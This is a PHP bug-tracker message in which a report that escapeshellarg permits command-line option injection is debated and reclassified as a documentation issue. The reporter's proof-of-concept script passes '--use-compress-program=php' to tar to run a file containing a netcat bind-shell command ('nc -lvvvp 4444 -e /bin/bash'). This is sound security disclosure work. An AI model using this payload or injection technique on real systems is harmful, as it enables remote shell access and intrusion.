Sec Bug->Doc #65755 [Opn]: Command injection is possible through escapeshellarg
| From: | stas@php.net | Date: | Mon, 09 Jun 2014 05:43:54 +0000 |
| Subject: | Sec Bug->Doc #65755 [Opn]: Command injection is possible through escapeshellarg | ||
| References: | 1 | Groups: | php.doc.bugs |
| Request: | Send a blank email to doc-bugs+get-11270@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=65755&edit=1
ID: 65755
Updated by: stas@php.net
Reported by: wireghoul at justanotherhacker dot com
Summary: Command injection is possible through escapeshellarg
Status: Open
-Type: Security
+Type: Documentation Problem
Package: *General Issues
Operating System: Linux
PHP Version: 5.4.20
Block user comment: N
Private report: Y
Previous Comments:
------------------------------------------------------------------------
[2013-09-30 22:59:12] wireghoul at justanotherhacker dot com
Hence my reference to a note in the documentation clarifying the safety of using escapeshellarg on
command line switches
------------------------------------------------------------------------
[2013-09-26 17:05:01] johannes@php.net
I think this is equivalent to
$safe_opts=escapeshellarg('-rf');
$safe_file=escapeshellarg('/');
$r=
rm $safe_opts $safe_file;
or any other options and rather obvious that we can't protect against bad parameters.
------------------------------------------------------------------------
[2013-09-24 21:40:12] wireghoul at justanotherhacker dot com
Description:
------------
Hi there,
The documentation and general belief in the PHP community appears to be that escapeshellarg allows
you to make user supplied data safe for use on the command line. While this is generally the case,
there are some cases where command injection is still possible as putting quotes around command line
options such as --exec= is still interpreted as command line options. I have attached a PoC that
opens a bindshell on port 4444 using this technique.
Cheers,
Eldar "Wireghoul" Marcussen
Test script:
---------------
<?php
# PoC exploit of php not escaping dash characters in escapeshellarg/cmd
# Reference: http://php.net/manual/en/function.escapeshellarg.php
# imagine an export/import function, or perhaps image resize function could be abused like this
# Create a malicious file:
$fh=fopen('myfile.png', 'w');
fwrite($fh, "<?php system('nc -lvvvp 4444 -e /bin/bash'); echo
'WINRAR!'; ?>");
fclose($fh);
# I choose to use php over bash due to string issues, you could use whatever
$safe_opts=escapeshellarg('--use-compress-program=php');
$safe_file=escapeshellarg('myfile.png'); # Really a php script with a .png extension
$r=tar $safe_opts -cf export.tar $safe_file;
print_r($r);
?>
Expected result:
----------------
Hard to say, some might argue that this is expected behaviour, in which case the PHP documentation
should contain a caveaut IMHO.
Actual result:
--------------
netcat binds a shell to port 4444
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=65755&edit=1